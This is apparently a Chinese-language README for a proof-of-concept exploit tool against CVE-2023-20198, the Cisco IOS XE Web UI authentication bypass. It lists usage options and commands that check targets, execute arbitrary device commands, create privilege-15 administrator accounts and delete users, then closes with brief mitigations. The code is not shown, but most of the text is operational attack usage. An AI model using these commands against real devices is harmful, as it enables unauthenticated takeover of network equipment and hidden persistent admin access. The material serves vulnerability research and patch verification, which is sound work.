此仓库包含针对 CVE-2023-20198 的概念验证(PoC)漏洞利用程序,该漏洞是影响 Cisco IOS XE Web UI 的身份验证绕过漏洞。
该漏洞允许未认证攻击者通过精心构造的 SOAP 请求在受影响的 Cisco 设备上执行任意命令,可能导致设备完全失陷,包括远程命令执行以及创建/删除管理用户。
CVE:CVE-2023-20198
受影响产品:Cisco IOS XE(Web UI / WSMA 接口)
影响:
攻击向量:网络(HTTP/HTTPS)
所需权限:无(未认证)
该漏洞是由于 Web Services Management Agent(WSMA) 端点对身份验证处理不当所致,攻击者可利用精心构造的 HTTP 请求绕过身份验证。
requestscolorama安装依赖:
pip install -r requirements.txt
usage: main.py [-h] -t TARGET [-c] [-C CMD] [-a] [-d] [-u USERNAME] [-p PASSWORD]
Authentication Bypass Exploit for Cisco IOS XE Devices (CVE-2023-20198)
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Target Cisco IOS XE Device
-c, --check Check if the Target is vulnerable to CVE-2023-20198
-C CMD, --cmd CMD Cisco IOS XE Command to Execute
-a, --add Add New Username and Password
-d, --delete Delete existing User
-u USERNAME, --username USERNAME
Username for Account Creation
-p PASSWORD, --password PASSWORD
Password for Account Creation (Random Password Generated if not Provided)

检查目标是否存在漏洞:
python3 exploit.py -t https://<TARGET-IP> -c

如果存在漏洞,该工具将自动检测可利用的 WSMA 端点并显示设备详细信息。
在受影响设备上执行命令:
python3 exploit.py -t https://<TARGET-IP> -C "<COMMAND>"
示例:
python3 exploit.py -t https://<TARGET-IP> -C "show running | include username"

创建一个新的特权级别 15 的管理用户:
python3 exploit.py -t https://<TARGET-IP> -a -u cisco -p kaptaan

如果未提供密码,脚本将自动生成随机安全密码。
使用新创建的账户,您可以访问设备的 Web UI

删除现有用户:
python3 exploit.py -t https://<TARGET-IP> -d -u cisco

将 Cisco IOS XE 升级到最新补丁版本
如非必要,禁用 Web UI:
no ip http server
no ip http secure-server
通过 ACL 限制管理访问
| 选项 | 说明 |
|---|
-t, --target | 目标 Cisco IOS XE 设备(必需) |
-c, --check | 检查目标是否存在漏洞 |
-C, --cmd | 执行 Cisco IOS XE 命令 |
-a, --add | 添加新的管理用户 |
-d, --delete | 删除现有用户 |
-u, --username | 用于创建/删除账户的用户名 |
-p, --password | 新账户的密码(未提供时随机生成) |